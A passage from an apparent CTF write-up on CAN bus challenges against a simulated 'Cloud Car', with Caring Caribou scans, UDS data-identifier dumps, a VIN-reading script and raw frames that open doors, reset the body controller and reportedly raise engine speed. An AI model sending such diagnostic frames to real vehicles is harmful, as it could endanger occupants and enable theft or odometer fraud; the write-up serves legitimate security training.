INPUT_OUTPUT_CONTROL_BY_IDENTIFIER 58 | ./cc.py dcm subfunc 0x620 0x520 0x2f 2 3 59 | ------------------- 60 | CARING CARIBOU v0.3 61 | ------------------- 62 | Loaded module 'dcm' 63 | Starting DCM sub-function discovery 64 | Probing sub-function 0x2f data ['ff', 'ff'] (found: 8) 65 | Done: Scan finished 66 | Found sub-functions for service 0x2f (INPUT_OUTPUT_CONTROL_BY_IDENTIFIER): 67 | Sub-function 02 0d 68 | Sub-function 02 a0 69 | Sub-function 02 a1 70 | Sub-function 02 a2 71 | Sub-function 14 36 72 | Sub-function 22 24 73 | Sub-function 22 25 74 | Sub-function 33 34 75 | ``` 76 | 77 | After that, I started sending data to the sub-functions. Example 78 | 79 | ``` 80 | cangen vcan0 -I 620 -D 072F2224FFFFFFFF -L 8 81 | ``` 82 | 83 | This caused the driver door to open. Sending 0s instead of Fs closed it. I never narrowed down which bit actually did the door, but it didn't matter at that point. 84 | 85 | Went through and tested all the IOCBI sub-functions I found and was able to do wipers, sprayer, headlights, flashers, doors, trunk, fuel pump, and the Temp on the cluster. 86 | 87 | One of the IOCBI sub functions makes the car go fast with out any gas, btw. Fun bug. 88 | 89 | 90 | ## Get In Door Open - 50 91 | 92 | With [Cloud Car](https://cloudcar.canbushack.com) 93 | 94 | Using CAN Messaging, open the **Passenger Door**. 95 | 96 | I tried the same things as the other door, but no luck. The techniques the other team used for solving previous challenge work for this one, too. 97 | 98 | 99 | ## Engine Memory - 50 100 | 101 | With [Cloud Car](https://cloudcar.canbushack.com) 102 | 103 | Using CAN Messaging, read the **ECM Memory**. 104 | 105 | ```bash 106 | # DID NOT ATTEMPT 107 | ``` 108 | 109 | 110 | ## Engine Overspeed - 50 111 | 112 | With [Cloud Car](https://cloudcar.canbushack.com) 113 | 114 | Using CAN Messaging, make the **Engine Speed High **. 115 | 116 | I didn't attempt this one. I talked to one of the other teams, and they said they got it to work by sending messages to ArbIDs 0x064 and 0x074. They changed some of the octets to all F's and it worked. Haven't tried to see exactly how they pulled it off. 117 | 118 | Here's a snapshot of sniffing normal traffic: 119 | 120 | ``` 121 | $ cansniffer -ct0 vcan0 122 | 00|ms | ID | data ... < vcan0 # l=20 h=100 t=0 slots=1 > 123 | 00232 | 064 | 27 10 00 B6 10 5A '....Z 124 | 00022 | 074 | C0 0D 70 8E D1 96 00 00 ..p..... 125 | 00051 | 12D | 00 3E 00 16 00 00 .>.... 126 | 00025 | 202 | 00 00 00 ... 127 | 00206 | 264 | 03 00 00 00 00 00 00 00 ........ 128 | 00132 | 2EE | DD CC EE FF 00 00 ...... 129 | 05195 | 350 | 3F 01 0C 00 00 1F ?..... 130 | 00443 | 411 | 00 F4 EB 3E 2B A1 B7 B0 ...>+... 131 | 00147 | 420 | F0 0D 04 00 00 00 ...... 132 | 00119 | 42C | 00 00 04 03 02 01 00 00 ........ 133 | ``` 134 | 135 | 136 | ## Lights - 50 137 | 138 | With [Cloud Car](https://cloudcar.canbushack.com) 139 | 140 | Using CAN Diagnostic Messaging, **Activate the Headlights**. 141 | 142 | I tried all the same tricks I used for the open door commands, but nothing worked. See [Kylle Door Open - 50](#Kylle%20Door%20Open%20-%2050) for a hint at the solution. 143 | 144 | 145 | ## Cluster Session Control - 50 146 | 147 | With [Cloud Car](https://cloudcar.canbushack.com) 148 | 149 | Using CAN Messaging, **IPC (Cluster) Session Control** to Enhanced Diagnostics. 150 | 151 | ```bash 152 | # DID NOT ATTEMPT 153 | ``` 154 | 155 | 156 | ## Engine Speed Read - 50 157 | 158 | With [Cloud Car](https://cloudcar.canbushack.com) 159 | 160 | Using CAN Messaging, read the **Engine Speed** from the ECM. 161 | 162 | Here's what I tried, but it didn't work. Based off of Wikipedia's list of [OBD2 PIDs](https://en.wikipedia.org/wiki/OBD-II_PIDs) 163 | ```bash 164 | # log all CAN messages 165 | candump -l vcan0 166 | 167 | # send OBD2 messages requesting engine speed to every ArbID 168 | cangen vcan0 -g1 -Ii -L8 -D 02010C0000000000 169 | 170 | # search the log for a successful response 171 | grep -i "410C" candump*.log 172 | ``` 173 | 174 | 175 | ## Airbag VIN - 75 176 | 177 | This is a VIN. But in the Airbag Controller! 178 | 179 | I wrote a script that grabs the VIN using the UDS "Read Data By Identifier" service (0x22), VIN request (identifier 0xF190). 180 | 181 | `getvin.sh`: 182 | ```bash 183 | #!/bin/bash 184 | 185 | iface="${1:-vcan0}" 186 | src="${2:-7e0}" 187 | dst="${3:-7e8}" 188 | 189 | # exit on error 190 | set -e 191 | 192 | # sniff and capture responses 193 | VINFILE="$(mktemp -u /tmp/vin-isotp-XXX)" 194 | isotprecv -s "$src" -d "$dst" -p 00 "$iface" > "$VINFILE" & 195 | recv_pid=$! 196 | 197 | # send the "get VIN" request 198 | echo -n '22 f1 90' | isotpsend -s "$src" -d "$dst" -p 00 "$iface" 199 | sleep 0.1 200 | 201 | # parse out VIN 202 | cat "$VINFILE" 203 | tail -c +10 "$VINFILE" | xxd -p -r 204 | echo 205 | 206 | rm "$VINFILE" 207 | kill $recv_pid &>/dev/null || true 208 | ``` 209 | 210 | ```bash 211 | # run my script to get the VIN 212 | $ ~/dev/getvin.sh vcan0 7f1 7f9 213 | 62 F1 90 01 31 46 4C 41 47 56 49 4E 53 52 53 34 32 30 36 39 30 214 | 1FLAGVINSRS420690 215 | ``` 216 | 217 | 218 | ## You Scanning (1st), (2nd) & (Last) - 100 219 | 220 | With [Cloud Car](https://cloudcar.canbushack.com) 221 | 222 | Using CAN Messaging, **SCAN for Diagnostic IDs**. 223 | 224 | Get all 3 Flags from Cloud Car. 225 | 226 | ```bash 227 | $ cat ~/.canrc 228 | [default] 229 | interface = socketcan 230 | 231 | # figure out what ECUs are out there responding to probes 232 | $ python3 cc.py -i vcan0 uds discovery 233 | Identified diagnostics: 234 | +------------+------------+ 235 | | 0x00000071 | 0x0000012d | 236 | | 0x00000620 | 0x00000520 | 237 | | 0x00000622 | 0x00000522 | 238 | | 0x0000062c | 0x0000052c | 239 | | 0x000007e0 | 0x000007e8 | 240 | | 0x000007e2 | 0x000007e9 | 241 | | 0x000007f1 | 0x000007f9 | 242 | +------------+------------+ 243 | 244 | # Re-ran, didn't see 12d response ID anymore 245 | +------------+------------+ 246 | | CLIENT ID | SERVER ID | 247 | +------------+------------+ 248 | | 0x00000620 | 0x00000520 | 249 | | 0x00000622 | 0x00000522 | 250 | | 0x0000062c | 0x0000052c | 251 | | 0x000007e0 | 0x000007e8 | 252 | | 0x000007e2 | 0x000007e9 | 253 | | 0x000007f1 | 0x000007f9 | 254 | +------------+------------+ 255 | 256 | # perform service discovery 257 | $ python3 cc.py -i vcan0 uds services 0x620 0x520 258 | Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL 259 | Supported service 0x11: ECU_RESET 260 | Supported service 0x22: READ_DATA_BY_IDENTIFIER 261 | Supported service 0x23: READ_MEMORY_BY_ADDRESS 262 | Supported service 0x27: SECURITY_ACCESS 263 | Supported service 0x28: COMMUNICATION_CONTROL 264 | Supported service 0x2e: WRITE_DATA_BY_IDENTIFIER 265 | Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER 266 | Supported service 0x3e: TESTER_PRESENT 267 | Supported service 0xba: Unknown service 268 | 269 | $ python3 cc.py -i vcan0 uds services 0x622 0x522 270 | Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL 271 | Supported service 0x11: ECU_RESET 272 | Supported service 0x22: READ_DATA_BY_IDENTIFIER 273 | Supported service 0x23: READ_MEMORY_BY_ADDRESS 274 | Supported service 0x27: SECURITY_ACCESS 275 | Supported service 0x28: COMMUNICATION_CONTROL 276 | Supported service 0x2e: WRITE_DATA_BY_IDENTIFIER 277 | Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER 278 | Supported service 0x3e: TESTER_PRESENT 279 | Supported service 0xba: Unknown service 280 | 281 | $ python3 cc.py -i vcan0 uds services 0x62c 0x52c 282 | Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL 283 | Supported service 0x11: ECU_RESET 284 | Supported service 0x22: READ_DATA_BY_IDENTIFIER 285 | Supported service 0x23: READ_MEMORY_BY_ADDRESS 286 | Supported service 0x27: SECURITY_ACCESS 287 | Supported service 0x28: COMMUNICATION_CONTROL 288 | Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER 289 | Supported service 0x3e: TESTER_PRESENT 290 | Supported service 0xba: Unknown service 291 | 292 | $ python3 cc.py -i vcan0 uds services 0x7e0 0x7e8 293 | Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL 294 | Supported service 0x11: ECU_RESET 295 | Supported service 0x22: READ_DATA_BY_IDENTIFIER 296 | Supported service 0x23: READ_MEMORY_BY_ADDRESS 297 | Supported service 0x27: SECURITY_ACCESS 298 | Supported service 0x28: COMMUNICATION_CONTROL 299 | Supported service 0x2e: WRITE_DATA_BY_IDENTIFIER 300 | Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER 301 | Supported service 0x3e: TESTER_PRESENT 302 | Supported service 0xba: Unknown service 303 | 304 | $ python3 cc.py -i vcan0 uds services 0x7e2 0x7e9 305 | Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL 306 | Supported service 0x11: ECU_RESET 307 | Supported service 0x22: READ_DATA_BY_IDENTIFIER 308 | Supported service 0x23: READ_MEMORY_BY_ADDRESS 309 | Supported service 0x27: SECURITY_ACCESS 310 | Supported service 0x28: COMMUNICATION_CONTROL 311 | Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER 312 | Supported service 0x3e: TESTER_PRESENT 313 | Supported service 0xba: Unknown service 314 | 315 | $ python3 cc.py -i vcan0 uds services 0x7f1 0x7f9 316 | Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL 317 | Supported service 0x11: ECU_RESET 318 | Supported service 0x22: READ_DATA_BY_IDENTIFIER 319 | Supported service 0x27: SECURITY_ACCESS 320 | Supported service 0x2e: WRITE_DATA_BY_IDENTIFIER 321 | Supported service 0x3e: TESTER_PRESENT 322 | 323 | # dump Data Identifiers for each ECU 324 | $ python3 cc.py -i vcan0 uds dump_dids 0x620 0x520 -t0.1 325 | Identified DIDs: 326 | DID Value (hex) 327 | 0x020d 62020d00 328 | 0x020e 62020e90 329 | 0x02a0 6202a000 330 | 0x02a1 6202a100 331 | 0x02a2 6202a200 332 | 0x1436 62143600 333 | 0x1703 62170300 334 | 0x1704 62170400 335 | 0x2224 62222400 336 | 0x2225 62222500 337 | 0x3334 62333400 338 | 0x4200 62420000000000 339 | 340 | $ python3 cc.py -i vcan0 uds dump_dids 0x622 0x522 -t0.1 341 | Identified DIDs: 342 | DID Value (hex) 343 | 0x010c 62010c0d70 344 | 0x010f 62010f00 345 | 0x0210 6202101f 346 | 0x0214 62021441 347 | 0x0300 62030001 348 | 0x030c 62030c01 349 | 0x0320 62032000 350 | 0x0345 62032100 351 | 0xfe00 62fe00010c0000 352 | 0xfe10 62fe10010c0000 353 | 354 | $ python3 cc.py -i vcan0 uds dump_dids 0x7e0 0x7e8 -t0.1 355 | Identified DIDs: 356 | DID Value (hex) 357 | 0x000c 62000c0d70 358 | 0x000d 62000d00 359 | 0x1000 62100001 360 | 0x2122 622122013143414e4255534841434b49534330304c 361 | 0x4200 624200010c0000 362 | 363 | $ python3 cc.py -i vcan0 uds dump_dids 0x7e2 0x7e9 -t0.1 364 | Identified DIDs: 365 | DID Value (hex) 366 | 0x010c 62010c0d70 367 | 0x010f 62010f00 368 | 0x030c 62030c01 369 | 0x0911 62091182 370 | 371 | $ python3 cc.py -i vcan0 uds dump_dids 0x7f1 0x7f9 -t0.1 372 | Identified DIDs: 373 | DID Value (hex) 374 | 0x1111 62111100 375 | 0xf1a0 62f1900131464c414756494e535253343230363930 376 | 0xfa01 62fa0100 377 | 0xfa02 62fa0201 378 | 0xfa03 62fa0001 379 | 0xfa06 62fa06010101 380 | 381 | # decoding values discovered from dump_dids: 382 | ❯ echo "3143414e4255534841434b49534330304c" | xxd -r -p 383 | 1CANBUSHACKISC00L # <-- new (whole) VIN 384 | 385 | ❯ echo "31464c414756494e535253343230363930" | xxd -r -p 386 | 1FLAGVINSRS420690 # <-- ABS VIN 387 | ``` 388 | 389 | Unfortunately, I didn't find any of the 3 flags, and don't know where to go from here. 390 | 391 | 392 | ## Whole VIN - 150 393 | 394 | With [Cloud Car](https://cloudcar.canbushack.com) 395 | 396 | What's the **VIN**? You have to read from the ECM! 397 | 398 | ```bash 399 | # trying with OBD2 (also tried on all ArbIDs 7e0-7e7) 400 | $ echo "09 02" | isotpsend -s 7df -d 7e8 -p 00 vcan0 401 | # failed 402 | 403 | # trying with UDS "get VIN" (also tried on al ArbIDs 7e0-7e7) 404 | $ echo "22 f1 90" | isotpsend -s 7e0 -d 7e8 -p 00 vcan0 405 | # failed 406 | ``` 407 | 408 | `getvin.sh`: 409 | ```bash 410 | #!/bin/bash 411 | 412 | iface="${1:-vcan0}" 413 | src="${2:-7e0}" 414 | dst="${3:-7e8}" 415 | 416 | # exit on error 417 | set -e 418 | 419 | # sniff and capture responses 420 | VINFILE="$(mktemp -u /tmp/vin-isotp-XXX)" 421 | isotprecv -s "$src" -d "$dst" -p 00 "$iface" > "$VINFILE" & 422 | recv_pid=$! 423 | 424 | # send the "get VIN" request 425 | echo -n '09 02' | isotpsend -s "$src" -d "$dst" -p 00 "$iface" 426 | sleep 0.1 427 | 428 | # parse out VIN 429 | cat "$VINFILE" 430 | tail -c +10 "$VINFILE" | xxd -p -r 431 | echo 432 | 433 | rm "$VINFILE" 434 | kill $recv_pid &>/dev/null || true 435 | ``` 436 | 437 | All those attempts failed. By chance, when I was [scanning](#You%20Scanning%201st%202nd%20Last%20-%20100), the `dump_dids` command showed me the other VIN: 438 | 439 | ```bash 440 | $ python3 cc.py -i vcan0 uds dump_dids 0x7e0 0x7e8 -t0.1 441 | Identified DIDs: 442 | DID Value (hex) 443 | 0x000c 62000c0d70 444 | 0x000d 62000d00 445 | 0x1000 62100001 446 | 0x2122 622122013143414e4255534841434b49534330304c 447 | 0x4200 624200010c0000 448 | 449 | $ echo "3143414e4255534841434b49534330304c" | xxd -r -p 450 | 1CANBUSHACKISC00L 451 | ``` 452 | 453 | 454 | ## Reset Body Cntl - 175 455 | 456 | With [Cloud Car](https://cloudcar.canbushack.com) 457 | 458 | Using CAN Messaging, open the **Reset the BCM**. 459 | 460 | I tried using `caringcaribou` to reset the ECU's but I think I needed to establish a diagnostic session first? My attempts failed. 461 | 462 | ```bash 463 | $ python3 cc.py -i vcan0 uds ecu_reset 0x7e0 0x7e8 464 | # tried sending to all identified ECU pairs: 465 | # 0x620 -> 0x520 466 | # 0x622 -> 0x522 467 | # 0x62c -> 0x52c 468 | # 0x7e0 -> 0x7e8 469 | # 0x7e2 -> 0x7e9 470 | # 0x7f1 -> 0x7f9 471 | ``` 472 | 473 | `@fearfulspoon` on Discord sent me his solution: 474 | 475 | ```bash 476 | # Start Diagnostic Control Session with the BCM 477 | cansend vcan0 '620#0210020000000000' 478 | 479 | # Send Reset ECU (0x03 = softReset) 480 | cansend vcan0 '620#0211030000000000' 481 | 482 | # also attempted 0x01 (hardReset) and 0x02 (keyOffOnReset) 483 | # first, but received errors. 484 | ``` 485 | 486 | So I was definitely missing the "start diagnostic session" piece. Knowing which ArbID corresponded to the BCM was partly just guesswork, but it is the same one that was used for actuating the doors, which makes sense (that's a typical BCM function). 487 | 488 | ## Rollback - 200 489 | 490 | With [Cloud Car](https://cloudcar.canbushack.com) 491 | 492 | Using CAN Messaging, open the **Roll Odometer back to ZERO**. 493 | 494 | ```bash 495 | # DID NOT ATTEMPT 496 | ``` 497 | 498 | 499 | ## Sec Escalate - 500 500 | 501 | With [Cloud Car](https://cloudcar.canbushack.com) 502 | 503 | Using CAN Messaging, open the **Update your Security Level on Controller**. 504 | 505 | ```bash 506 | # DID NOT ATTEMPT 507 | ``` 508 | 509 | 510 | ## Puff Air Bag YES - 650 511 | 512 | With [Cloud Car](https://cloudcar.canbushack.com) 513 | 514 | Using CAN Messaging, open the **Activate the Airbag**. 515 | 516 | If you do this, you are the like insane! Nice work. 517 | 518 | If you're the first to do this, We have a special Prize for you! (find @carfucar). 519 | 520 | ```bash 521 | # DID NOT ATTEMPT 522 | ``` 523 | 524 | --------------------------------------------------------------------------------